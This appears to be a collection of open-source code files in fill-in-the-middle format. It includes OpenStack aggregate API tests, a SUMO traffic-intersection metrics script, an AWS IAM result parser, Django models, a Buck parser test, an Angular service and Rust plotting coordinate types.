self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "1",
body={"add_host": {"host": "bogus_host"}})<|fim▁hole|>
def test_add_host_raises_key_error(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise KeyError
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
#NOTE(mtreinish) The check for a KeyError here is to ensure that
# if add_host_to_aggregate() raises a KeyError it propagates. At
        # one point the api code would mask the error as an HTTPBadRequest.
# This test is to ensure that this doesn't occur again.
self.assertRaises(KeyError, self.controller.action, self.req, "1",
body={"add_host": {"host": "host1"}})
def test_remove_host(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertEqual("host1", host, "host")
stub_remove_host_from_aggregate.called = True
return {}
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.controller.action(self.req, "1",
body={"remove_host": {"host": "host1"}})
self.assertTrue(stub_remove_host_from_aggregate.called)
def test_remove_host_with_bad_aggregate(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "bogus_aggregate",
body={"remove_host": {"host": "host1"}})
def test_remove_host_with_host_not_in_aggregate(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
raise exception.AggregateHostNotFound(aggregate_id=aggregate,
host=host)
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "1",
body={"remove_host": {"host": "host1"}})
def test_remove_host_with_bad_host(self):
def stub_remove_host_from_aggregate(context, aggregate, host):
raise exception.ComputeHostNotFound(host=host)
self.stubs.Set(self.controller.api,
"remove_host_from_aggregate",
stub_remove_host_from_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "1", body={"remove_host": {"host": "bogushost"}})
def test_remove_host_with_missing_host(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body={"asdf": "asdf"})
def test_remove_host_with_extra_param(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body={"remove_host": {"asdf": "asdf",
"host": "asdf"}})
def test_set_metadata(self):
body = {"set_metadata": {"metadata": {"foo": "bar"}}}
def stub_update_aggregate(context, aggregate, values):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertThat(body["set_metadata"]['metadata'],
matchers.DictMatches(values))
return AGGREGATE
self.stubs.Set(self.controller.api,
"update_aggregate_metadata",
stub_update_aggregate)
result = self.controller.action(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_set_metadata_with_bad_aggregate(self):
body = {"set_metadata": {"metadata": {"foo": "bar"}}}
def stub_update_aggregate(context, aggregate, metadata):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api,
"update_aggregate_metadata",
stub_update_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "bad_aggregate", body=body)
def test_set_metadata_with_missing_metadata(self):
body = {"asdf": {"foo": "bar"}}
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body=body)
def test_set_metadata_with_extra_params(self):
body = {"metadata": {"foo": "bar"}, "asdf": {"foo": "bar"}}
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body=body)
def test_delete_aggregate(self):
def stub_delete_aggregate(context, aggregate):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
stub_delete_aggregate.called = True
self.stubs.Set(self.controller.api, "delete_aggregate",
stub_delete_aggregate)
self.controller.delete(self.req, "1")
self.assertTrue(stub_delete_aggregate.called)
def test_delete_aggregate_with_bad_aggregate(self):
def stub_delete_aggregate(context, aggregate):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api, "delete_aggregate",
stub_delete_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.delete,
self.req, "bogus_aggregate")<|fim▁end|> |
def test_add_host_with_missing_host(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.action,
self.req, "1", body={"add_host": {"asdf": "asdf"}}) |
<|file_name|>generateITetrisIntersectionMetrics.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""
@file generateITetrisIntersectionMetrics.py
@author Daniel Krajzewicz
@author Lena Kalleske
@author Michael Behrisch
@date 2007-10-25
@version $Id: generateITetrisIntersectionMetrics.py 14425 2013-08-16 20:11:47Z behrisch $
SUMO, Simulation of Urban MObility; see http://sumo-sim.org/
Copyright (C) 2009-2013 DLR (http://www.dlr.de/) and contributors
All rights reserved
"""
from optparse import OptionParser
import os, sys
from numpy import mean
from math import log
from xml.sax import parse, handler
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import sumolib.net
def getBasicStats(net, lanesInfo, T):
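    """Aggregate per-lane e2 detector data into per-traffic-light statistics;
    queue length and waiting time are averaged over the total time T."""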
tlsInfo = {}
for tl in net._tlss:
tlID = tl._id
mQueueLen = []
# mWaitTime = []
nbStops = []
tWaitTime = []
seenLanes = set()
for conn in tl._connections:
lane = conn[0]
if lane in seenLanes:
continue
seenLanes.add(lane)
mQueueLenInfo = sum(lanesInfo[lane.getID()]['mQueueLen'])
mQueueLen.append(mQueueLenInfo)
# mWaitTimeInfo = mean(lanesInfo[lane.getID()]['mWaitTime'])
# mWaitTime.append(mWaitTimeInfo)
nbStopsInfo = sum(lanesInfo[lane.getID()]['nbStops'])
nbStops.append(nbStopsInfo)
tWaitTimeInfo = sum(lanesInfo[lane.getID()]['tWaitTime'])
tWaitTime.append(tWaitTimeInfo)
tlsInfo[tlID] = {}
tlsInfo[tlID]['mQueueLen'] = mean(mQueueLen) / T
tlsInfo[tlID]['mWaitTime'] = mean(tWaitTime) / T
tlsInfo[tlID]['nbStops'] = sum(nbStops)
tlsInfo[tlID]['tWaitTime'] = sum(tWaitTime)
return tlsInfo
def mergeInfos(tlsInfoAll, tlsInfoOne, metric):
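    """Copy one metric's per-traffic-light values into the combined tlsInfo dict."""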
for tl in tlsInfoOne.keys():
tlsInfoAll[tl][metric] = tlsInfoOne[tl]
def getStatisticsOutput(tlsInfo, outputfile):
opfile = file(outputfile, 'w')
for tl in tlsInfo.keys():
opfile.write('Traffic Light %s\n' % tl)
opfile.write('=================\n')
opfile.write('mean queue length in front of the junction: %s\n' % tlsInfo[tl]['mQueueLen'])
opfile.write('mean waiting time in front of the junction: %s\n' % tlsInfo[tl]['mWaitTime'])
if 'noise' in tlsInfo[tl]:<|fim▁hole|> opfile.write('mean CO emission: %s\n' % tlsInfo[tl]['CO'])
opfile.write('mean CO2 emission: %s\n' % tlsInfo[tl]['CO2'])
opfile.write('mean HC emission: %s\n' % tlsInfo[tl]['HC'])
opfile.write('mean PMx emission: %s\n' % tlsInfo[tl]['PMx'])
opfile.write('mean NOx emission: %s\n' % tlsInfo[tl]['NOx'])
opfile.write('mean fuel consumption: %s\n' % tlsInfo[tl]['fuel'])
opfile.write('number of stops: %s\n' % tlsInfo[tl]['nbStops'])
opfile.write('total waiting time at junction: %s\n\n' % tlsInfo[tl]['tWaitTime'])
def tlsIDToNodeID(net):
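    """Map each traffic light ID to the junction node IDs its connections lead to."""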
tlsID2NodeID = {}
for tls in net._tlss:
tlsID = tls._id
tlsID2NodeID[tlsID] = []
seenNodes = set()
for conn in tls._connections:
lane = conn[0]
edge = lane._edge
node = edge._to
nodeID = node._id
if nodeID not in seenNodes:
tlsID2NodeID[tlsID].append(nodeID)
seenNodes.add(nodeID)
return tlsID2NodeID
class E2OutputReader(handler.ContentHandler):
def __init__(self):
self._lanes = {}
self._maxT = 0
def startElement(self, name, attrs):
if name == 'interval':
detID = attrs['id']
laneID = detID[6:len(detID)]
if not self._lanes.has_key(laneID):
self._lanes[laneID] = {}
self._lanes[laneID]['mQueueLen'] = []
# self._lanes[laneID]['mWaitTime'] = []
self._lanes[laneID]['nbStops'] = []
self._lanes[laneID]['tWaitTime'] = []
if float(attrs['end']) < 100000000:
self._lanes[laneID]['mQueueLen'].append(float(attrs['jamLengthInMetersSum']))
# self._lanes[laneID]['mWaitTime'].append(float(attrs['meanHaltingDuration']))
self._lanes[laneID]['nbStops'].append(float(attrs['startedHalts']))
self._lanes[laneID]['tWaitTime'].append(float(attrs['haltingDurationSum']))
self._maxT = max(float(attrs['end']), self._maxT)
class HarmonoiseReader(handler.ContentHandler):
def __init__(self, net, tlsID2NodeID):
self._nodeIntervalNoise = {}
self._maxT = 0
self._net = net
self._tlsNoise = {}
self._tlsID2NodeID = tlsID2NodeID
def startElement(self, name, attrs):
if name == 'interval':
self._maxT = max(float(attrs['end']), self._maxT)
if name == 'edge':
edgeID = attrs['id']
noiseStr = attrs['noise']
if len(noiseStr) < 10:
noise = float(noiseStr)
else:
noise = 0
if edgeID[0]==':':
nodeID = edgeID[1:edgeID.find('_')]
if nodeID not in self._nodeIntervalNoise:
self._nodeIntervalNoise[nodeID] = []
self._nodeIntervalNoise[nodeID].append(noise)
else:
fromNodeID = net.getEdge(edgeID)._from._id
if fromNodeID not in self._nodeIntervalNoise:
self._nodeIntervalNoise[fromNodeID] = []
self._nodeIntervalNoise[fromNodeID].append(noise)
toNodeID = net.getEdge(edgeID)._to._id
if toNodeID not in self._nodeIntervalNoise:
self._nodeIntervalNoise[toNodeID] = []
self._nodeIntervalNoise[toNodeID].append(noise)
def endElement(self, name):
if name == 'interval':
self.sumIntervalNoise()
if name == 'netstats':
self.sumNoise()
def sumIntervalNoise(self):
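        # Combine the nodes' noise levels acoustically: convert dB to power, sum, convert back to dB.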
for tls in net._tlss:
sum = 0
tlsID = tls._id
if tlsID not in self._tlsNoise:
self._tlsNoise[tlsID] = []
for nodeID in self._tlsID2NodeID[tlsID]:
for noise in self._nodeIntervalNoise[nodeID]:
sum = sum + pow(10, noise/10)
self._tlsNoise[tlsID].append(10 * log(sum)/log(10))
def sumNoise(self):
for tls in net._tlss:
tlsID = tls._id
self._tlsNoise[tlsID] = sum(self._tlsNoise[tlsID]) / self._maxT
class HBEFAReader(handler.ContentHandler):
def __init__(self, net, tlsID2NodeID):
self._maxT = 0
self._net = net
self._nodeIntervalCO = {}
self._nodeIntervalCO2 = {}
self._nodeIntervalHC = {}
self._nodeIntervalPMx = {}
self._nodeIntervalNOx = {}
self._nodeIntervalfuel = {}
self._tlsCO = {}
self._tlsCO2 = {}
self._tlsHC = {}
self._tlsPMx = {}
self._tlsNOx = {}
self._tlsfuel = {}
self._tlsID2NodeID = tlsID2NodeID
def startElement(self, name, attrs):
if name == 'interval':
self._maxT = max(float(attrs['end']), self._maxT)
if name == 'edge':
edgeID = attrs['id']
CO = float(attrs['CO_perVeh'])
CO2 = float(attrs['CO2_perVeh'])
HC = float(attrs['HC_perVeh'])
PMx = float(attrs['PMx_perVeh'])
NOx = float(attrs['NOx_perVeh'])
fuel = float(attrs['fuel_perVeh'])
if edgeID[0]==':':
                nodeIDs = [edgeID[1:edgeID.find('_')]]  # a list, so the loop below sees one ID rather than its characters
else:
fromNodeID = net.getEdge(edgeID)._from._id
toNodeID = net.getEdge(edgeID)._to._id
nodeIDs = [fromNodeID, toNodeID]
for nodeID in nodeIDs:
if nodeID not in self._nodeIntervalCO:
self._nodeIntervalCO[nodeID] = []
self._nodeIntervalCO2[nodeID] = []
self._nodeIntervalHC[nodeID] = []
self._nodeIntervalPMx[nodeID] = []
self._nodeIntervalNOx[nodeID] = []
self._nodeIntervalfuel[nodeID] = []
self._nodeIntervalCO[nodeID].append(CO)
self._nodeIntervalCO2[nodeID].append(CO2)
self._nodeIntervalHC[nodeID].append(HC)
self._nodeIntervalPMx[nodeID].append(PMx)
self._nodeIntervalNOx[nodeID].append(NOx)
self._nodeIntervalfuel[nodeID].append(fuel)
def endElement(self, name):
if name == 'interval':
self.sumInterval()
if name == 'netstats':
self.sum()
def sumInterval(self):
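        # Total each pollutant over all nodes belonging to this traffic light for the current interval.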
for tls in net._tlss:
tlsID = tls._id
if tlsID not in self._tlsCO:
self._tlsCO[tlsID] = []
self._tlsCO2[tlsID] = []
self._tlsHC[tlsID] = []
self._tlsPMx[tlsID] = []
self._tlsNOx[tlsID] = []
self._tlsfuel[tlsID] = []
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalCO[nodeID]:
sum = sum + v
self._tlsCO[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalCO2[nodeID]:
sum = sum + v
self._tlsCO2[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalHC[nodeID]:
sum = sum + v
self._tlsHC[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalPMx[nodeID]:
sum = sum + v
self._tlsPMx[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalNOx[nodeID]:
sum = sum + v
self._tlsNOx[tlsID].append(sum)
sum = 0
for nodeID in self._tlsID2NodeID[tlsID]:
for v in self._nodeIntervalfuel[nodeID]:
sum = sum + v
self._tlsfuel[tlsID].append(sum)
def sum(self):
for tls in net._tlss:
tlsID = tls._id
self._tlsCO[tlsID] = sum(self._tlsCO[tlsID]) / self._maxT
self._tlsCO2[tlsID] = sum(self._tlsCO2[tlsID]) / self._maxT
self._tlsHC[tlsID] = sum(self._tlsHC[tlsID]) / self._maxT
self._tlsPMx[tlsID] = sum(self._tlsPMx[tlsID]) / self._maxT
self._tlsNOx[tlsID] = sum(self._tlsNOx[tlsID]) / self._maxT
self._tlsfuel[tlsID] = sum(self._tlsfuel[tlsID]) / self._maxT
# initialise
optParser = OptionParser()
optParser.add_option("-n", "--netfile", dest="netfile",
help="name of the netfile (f.e. 'inputs\\pasubio\\a_costa.net.xml')", metavar="<FILE>", type="string")
optParser.add_option("-p", "--path", dest="path",
help="name of folder to work with (f.e. 'inputs\\a_costa\\')", metavar="<FOLDER>", type="string", default="./")
optParser.add_option("-o", "--harmonoiseFile", dest="harmonoiseFile",
help="name of the harmonoise file", metavar="<FOLDER>", type="string")
optParser.add_option("-e", "--HBEFAFile", dest="hbefaFile",
help="name of the HBEFA file", metavar="<FOLDER>", type="string")
optParser.set_usage('\n-n inputs\\pasubio\\pasubio.net.xml -p inputs\\pasubio\\')
# parse options
(options, args) = optParser.parse_args()
if not options.netfile:
print "Missing arguments"
optParser.print_help()
exit()
netfile = options.netfile
e2OutputFile = os.path.join(options.path, 'e2_output.xml')
net = sumolib.net.readNet(netfile)
e2Output = E2OutputReader()
parse(e2OutputFile, e2Output)
tlsID2NodeID = tlsIDToNodeID(net)
tlsInfo = getBasicStats(net, e2Output._lanes, e2Output._maxT)
if options.harmonoiseFile:
harmonoiseOutput = HarmonoiseReader(net, tlsID2NodeID)
parse(options.harmonoiseFile, harmonoiseOutput)
mergeInfos(tlsInfo, harmonoiseOutput._tlsNoise, 'noise')
if options.hbefaFile:
hbefaOutput = HBEFAReader(net, tlsID2NodeID)
    parse(options.hbefaFile, hbefaOutput)
mergeInfos(tlsInfo, hbefaOutput._tlsCO, 'CO')
mergeInfos(tlsInfo, hbefaOutput._tlsCO2, 'CO2')
mergeInfos(tlsInfo, hbefaOutput._tlsHC, 'HC')
mergeInfos(tlsInfo, hbefaOutput._tlsPMx, 'PMx')
mergeInfos(tlsInfo, hbefaOutput._tlsNOx, 'NOx')
mergeInfos(tlsInfo, hbefaOutput._tlsfuel, 'fuel')
getStatisticsOutput(tlsInfo, os.path.join(options.path, "intersection_metrics_summary.txt"))
print 'The calculation is done!'<|fim▁end|> | opfile.write('mean noise emission: %s\n' % tlsInfo[tl]['noise'])
if 'CO' in tlsInfo[tl]: |
<|file_name|>ListServerCertificatesResult.cpp<|end_file_name|><|fim▁begin|>/*
* Copyright 2010-2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
#include <aws/iam/model/ListServerCertificatesResult.h>
#include <aws/core/utils/xml/XmlSerializer.h>
#include <aws/core/AmazonWebServiceResult.h>
#include <aws/core/utils/StringUtils.h>
#include <aws/core/utils/logging/LogMacros.h>
#include <utility>
using namespace Aws::IAM::Model;
using namespace Aws::Utils::Xml;
using namespace Aws::Utils::Logging;
using namespace Aws::Utils;
using namespace Aws;
ListServerCertificatesResult::ListServerCertificatesResult() :
m_isTruncated(false)
{
}
ListServerCertificatesResult::ListServerCertificatesResult(const AmazonWebServiceResult<XmlDocument>& result) :
m_isTruncated(false)
{
*this = result;
}
ListServerCertificatesResult& ListServerCertificatesResult::operator =(const AmazonWebServiceResult<XmlDocument>& result)
{
const XmlDocument& xmlDocument = result.GetPayload();
XmlNode rootNode = xmlDocument.GetRootElement();
XmlNode resultNode = rootNode;
if (rootNode.GetName() != "ListServerCertificatesResult")
{
resultNode = rootNode.FirstChild("ListServerCertificatesResult");
}
if(!resultNode.IsNull())
{
XmlNode serverCertificateMetadataListNode = resultNode.FirstChild("ServerCertificateMetadataList");
if(!serverCertificateMetadataListNode.IsNull())
{
XmlNode serverCertificateMetadataListMember = serverCertificateMetadataListNode.FirstChild("member");
while(!serverCertificateMetadataListMember.IsNull())
{
m_serverCertificateMetadataList.push_back(serverCertificateMetadataListMember);
serverCertificateMetadataListMember = serverCertificateMetadataListMember.NextNode("member");
}<|fim▁hole|> }
XmlNode isTruncatedNode = resultNode.FirstChild("IsTruncated");
if(!isTruncatedNode.IsNull())
{
m_isTruncated = StringUtils::ConvertToBool(StringUtils::Trim(isTruncatedNode.GetText().c_str()).c_str());
}
XmlNode markerNode = resultNode.FirstChild("Marker");
if(!markerNode.IsNull())
{
m_marker = StringUtils::Trim(markerNode.GetText().c_str());
}
}
XmlNode responseMetadataNode = rootNode.FirstChild("ResponseMetadata");
m_responseMetadata = responseMetadataNode;
AWS_LOGSTREAM_DEBUG("Aws::IAM::Model::ListServerCertificatesResult", "x-amzn-request-id: " << m_responseMetadata.GetRequestId() );
return *this;
}<|fim▁end|> | |
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.db import models
from django_hstore import hstore
# Create your models here.
class Place(models.Model):
osm_type = models.CharField(max_length=1)
osm_id = models.IntegerField(primary_key=True)
class_field = models.TextField(db_column='class') # Field renamed because it was a Python reserved word.
type = models.TextField()
name = hstore.DictionaryField(blank=True) # This field type is a guess.
admin_level = models.IntegerField(null=True, blank=True)
housenumber = models.TextField(blank=True)
street = models.TextField(blank=True)
isin = models.TextField(blank=True)
postcode = models.TextField(blank=True)
country_code = models.CharField(max_length=2, blank=True)
extratags = models.TextField(blank=True) # This field type is a guess.
geometry = models.TextField() # This field type is a guess.
objects = hstore.HStoreManager()
    class Meta:
managed = False
        db_table = 'place'
unique_together = ('osm_id', 'class_field')
class Phonetique(models.Model):
nom = models.TextField()
#osm_id = models.IntegerField()
osm = models.ForeignKey(Place)
poids = models.IntegerField()
ville = models.CharField(max_length=200)
semantic = models.CharField(max_length=25)
    class Meta:
managed = False
        db_table = 'phonetique'
def __unicode__(self):<|fim▁hole|><|fim▁end|> | return '%d, %s' % (self.poids, self.nom) |
<|file_name|>DefaultUnconfiguredTargetNodeFactoryTest.java<|end_file_name|><|fim▁begin|>/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.facebook.buck.parser;
import static org.junit.Assert.assertEquals;
import com.facebook.buck.core.cell.Cell;
import com.facebook.buck.core.cell.TestCellBuilder;
import com.facebook.buck.core.exceptions.DependencyStack;
import com.facebook.buck.core.model.ConfigurationBuildTargetFactoryForTests;
import com.facebook.buck.core.model.RuleType;
import com.facebook.buck.core.model.UnconfiguredBuildTargetFactoryForTests;
import com.facebook.buck.core.model.UnconfiguredBuildTargetView;
import com.facebook.buck.core.model.targetgraph.impl.Package;
import com.facebook.buck.core.model.targetgraph.raw.UnconfiguredTargetNode;
import com.facebook.buck.core.parser.buildtargetparser.ParsingUnconfiguredBuildTargetViewFactory;
import com.facebook.buck.core.plugin.impl.BuckPluginManagerFactory;
import com.facebook.buck.core.rules.knowntypes.TestKnownRuleTypesProvider;
import com.facebook.buck.core.rules.knowntypes.provider.KnownRuleTypesProvider;
import com.facebook.buck.core.select.Selector;
import com.facebook.buck.core.select.SelectorKey;
import com.facebook.buck.core.select.SelectorList;
import com.facebook.buck.core.select.impl.SelectorFactory;
import com.facebook.buck.core.select.impl.SelectorListFactory;
import com.facebook.buck.parser.api.ImmutablePackageMetadata;
import com.facebook.buck.parser.syntax.ImmutableListWithSelects;
import com.facebook.buck.parser.syntax.ImmutableSelectorValue;
import com.facebook.buck.rules.coercer.JsonTypeConcatenatingCoercerFactory;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableMap;
import com.google.common.collect.ImmutableSet;
import com.google.common.collect.Iterables;
import java.util.List;
import java.util.Optional;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
public class DefaultUnconfiguredTargetNodeFactoryTest {
private DefaultUnconfiguredTargetNodeFactory factory;
private Cell cell;
@Rule public ExpectedException thrown = ExpectedException.none();
@Before
public void setUp() {
KnownRuleTypesProvider knownRuleTypesProvider =
TestKnownRuleTypesProvider.create(BuckPluginManagerFactory.createPluginManager());
cell = new TestCellBuilder().build();
factory =
new DefaultUnconfiguredTargetNodeFactory(
knownRuleTypesProvider,
new BuiltTargetVerifier(),
cell.getCellPathResolver(),
new SelectorListFactory(
new SelectorFactory(new ParsingUnconfiguredBuildTargetViewFactory())));
}
@Test
public void testCreatePopulatesNode() {
UnconfiguredBuildTargetView buildTarget =
UnconfiguredBuildTargetFactoryForTests.newInstance("//a/b:c");
ImmutableMap<String, Object> inputAttributes =
ImmutableMap.<String, Object>builder()
.put("buck.type", "java_library")<|fim▁hole|> "resources",
ImmutableListWithSelects.of(
ImmutableList.of(
ImmutableSelectorValue.of(
ImmutableMap.of(
"//c:a",
ImmutableList.of("//a/b:file1", "//a/b:file2"),
"//c:b",
ImmutableList.of("//a/b:file3", "//a/b:file4")),
"")),
ImmutableList.class))
.put("visibility", ImmutableList.of("//a/..."))
.put("within_view", ImmutableList.of("//b/..."))
.build();
ImmutableMap<String, Object> expectAttributes =
ImmutableMap.<String, Object>builder()
.put("buck.type", "java_library")
.put("name", "c")
.put("buck.base_path", "a/b")
.put("deps", ImmutableList.of("//a/b:d", "//a/b:e"))
.put(
"resources",
new SelectorList<>(
JsonTypeConcatenatingCoercerFactory.createForType(List.class),
ImmutableList.of(
new Selector<>(
ImmutableMap.of(
new SelectorKey(
ConfigurationBuildTargetFactoryForTests.newInstance("//c:a")),
ImmutableList.of("//a/b:file1", "//a/b:file2"),
new SelectorKey(
ConfigurationBuildTargetFactoryForTests.newInstance("//c:b")),
ImmutableList.of("//a/b:file3", "//a/b:file4")),
ImmutableSet.of(),
""))))
.put("visibility", ImmutableList.of("//a/..."))
.put("within_view", ImmutableList.of("//b/..."))
.build();
UnconfiguredTargetNode unconfiguredTargetNode =
factory.create(
cell,
cell.getRoot().resolve("a/b/BUCK"),
buildTarget,
DependencyStack.root(),
inputAttributes,
getPackage());
assertEquals(
RuleType.of("java_library", RuleType.Kind.BUILD), unconfiguredTargetNode.getRuleType());
assertEquals(buildTarget.getData(), unconfiguredTargetNode.getBuildTarget());
assertEquals(expectAttributes, unconfiguredTargetNode.getAttributes());
assertEquals(
"//a/...",
Iterables.getFirst(unconfiguredTargetNode.getVisibilityPatterns(), null)
.getRepresentation());
assertEquals(
"//b/...",
Iterables.getFirst(unconfiguredTargetNode.getWithinViewPatterns(), null)
.getRepresentation());
}
Package getPackage() {
ImmutablePackageMetadata pkg =
ImmutablePackageMetadata.of(ImmutableList.of("//a/..."), ImmutableList.of("//d/..."));
return PackageFactory.create(cell, cell.getRoot().resolve("a/b/BUCK"), pkg, Optional.empty());
}
}<|fim▁end|> | .put("name", "c")
.put("buck.base_path", "a/b")
.put("deps", ImmutableList.of("//a/b:d", "//a/b:e"))
.put( |
<|file_name|>json-reference.service.ts<|end_file_name|><|fim▁begin|>import { Injectable } from '@angular/core';
@Injectable()
export class JsonReferenceService {
constructor() { }
dereference<T>(obj: any, $ref: string): T {
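    // Walks the local JSON Pointer one path segment at a time, returning null as soon as a segment is missing.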
if(!$ref.startsWith('#/')) {
console.warn('Invalid $ref. Only references to current document supported.', $ref);
return null;
}
let parts = $ref.substr(2).split('/');
for(let i = 0; i < parts.length; i++) {
obj = obj[parts[i]];
if(obj === undefined) return null;
}
return <T>obj;
}<|fim▁hole|><|fim▁end|> | } |
<|file_name|>coords.rs<|end_file_name|><|fim▁begin|>//! Coordinate systems and geometry definitions. Some conversions are dependent on the application
//! state, and so those functions are a part of the `AppContext`.
use crate::app::config;
use metfor::{Celsius, CelsiusDiff, HectoPascal, Knots, Meters, PaPS, WindSpdDir};
/// Common operations on rectangles
pub trait Rect {
/// Get the minimum x coordinate
fn min_x(&self) -> f64;
/// Get the maximum x coordinate
fn max_x(&self) -> f64;
/// Get the minimum y coordinate
fn min_y(&self) -> f64;
/// Get the maximum y coordinate
fn max_y(&self) -> f64;
/// Check if two rectangles overlap
fn overlaps(&self, other: &Self) -> bool {
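        // Two rectangles overlap unless one lies entirely to one side of the other on either axis.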
if self.min_x() > other.max_x() {
return false;
}
if self.max_x() < other.min_x() {
return false;
}
if self.min_y() > other.max_y() {
return false;
}
if self.max_y() < other.min_y() {
return false;
}
true
}
    /// Check if this rectangle is inside another.
fn inside(&self, big_rect: &Self) -> bool {
if self.min_x() < big_rect.min_x() {
return false;
}
if self.max_x() > big_rect.max_x() {
return false;
}
if self.min_y() < big_rect.min_y() {
return false;
}
if self.max_y() > big_rect.max_y() {
return false;
}
true
}
/// Get the width of this rectangle
fn width(&self) -> f64 {
self.max_x() - self.min_x()
}
/// Get the height of this rectangle
fn height(&self) -> f64 {
self.max_y() - self.min_y()
}
}
/***************************************************************************************************
* Temperature - Pressure Coordinates for Skew-T Log-P plot.
* ************************************************************************************************/
/// Temperature-Pressure coordinates.
/// Origin lower left. (Temperature, Pressure)
#[derive(Clone, Copy, Debug)]
pub struct TPCoords {
/// Temperature in Celsius
pub temperature: Celsius,
/// Pressure in hPa
pub pressure: HectoPascal,
}
/***************************************************************************************************
* Speed - Direction Coordinates for the Hodograph
* ************************************************************************************************/
/// Speed-Direction coordinates for the hodograph.
/// Origin center. (Speed, Direction wind is from)
#[derive(Clone, Copy, Debug)]
pub struct SDCoords {
/// Wind speed and direction.
pub spd_dir: WindSpdDir<Knots>,
}
/***************************************************************************************************
* Omega(W) - Pressure coords for the vertical velocity and RH plot
* ************************************************************************************************/
/// Omega-Pressure coordinates.
/// Origin lower left. (Omega, Pressure)
#[derive(Clone, Copy, Debug)]
pub struct WPCoords {
/// Omega in Pa/s
pub w: PaPS,
/// Pressure in hPa
pub p: HectoPascal,
}
/***************************************************************************************************
* Percent - Pressure coords for the Cloud Cover
* ************************************************************************************************/
/// Percent-Pressure coordinates.
#[derive(Clone, Copy, Debug)]
pub struct PPCoords {<|fim▁hole|> /// Percent 0.0 - 1.0
pub pcnt: f64,
/// Pressure in hPa
pub press: HectoPascal,
}
/***************************************************************************************************
* Speed - Pressure coords for the wind speed profile
* ************************************************************************************************/
/// Speed-Pressure coordinates.
#[derive(Clone, Copy, Debug)]
pub struct SPCoords {
/// Speed in knots
pub spd: Knots,
/// Pressure in hPa
pub press: HectoPascal,
}
/***************************************************************************************************
* △T - Height coords for the fire plume chart
* ************************************************************************************************/
/// DeltaT-Height coordinates.
#[derive(Clone, Copy, Debug)]
pub struct DtHCoords {
/// DeltaT in Celsius
pub dt: CelsiusDiff,
/// Height in meters
pub height: Meters,
}
/***************************************************************************************************
* △T - Percent coords for the percent wet cape chart.
* ************************************************************************************************/
/// DeltaT-Percent coordinates.
#[derive(Clone, Copy, Debug)]
pub struct DtPCoords {
/// DeltaT in Celsius
pub dt: CelsiusDiff,
    /// Percent 0.0 - 1.0
pub percent: f64,
}
/***************************************************************************************************
* X - Y Coords for a default plot area that can be zoomed and panned
* ************************************************************************************************/
/// XY coordinates of the skew-t graph, range 0.0 to 1.0. This coordinate system is dependent on
/// settings for the maximum/minimum plottable pressure and temperatures in the config module.
/// Origin lower left, (x,y)
#[derive(Clone, Copy, Debug)]
pub struct XYCoords {
pub x: f64,
pub y: f64,
}
impl XYCoords {
pub fn origin() -> Self {
XYCoords { x: 0.0, y: 0.0 }
}
}
#[derive(Clone, Copy, Debug)]
pub struct XYRect {
pub lower_left: XYCoords,
pub upper_right: XYCoords,
}
impl Rect for XYRect {
fn min_x(&self) -> f64 {
self.lower_left.x
}
fn max_x(&self) -> f64 {
self.upper_right.x
}
fn min_y(&self) -> f64 {
self.lower_left.y
}
fn max_y(&self) -> f64 {
self.upper_right.y
}
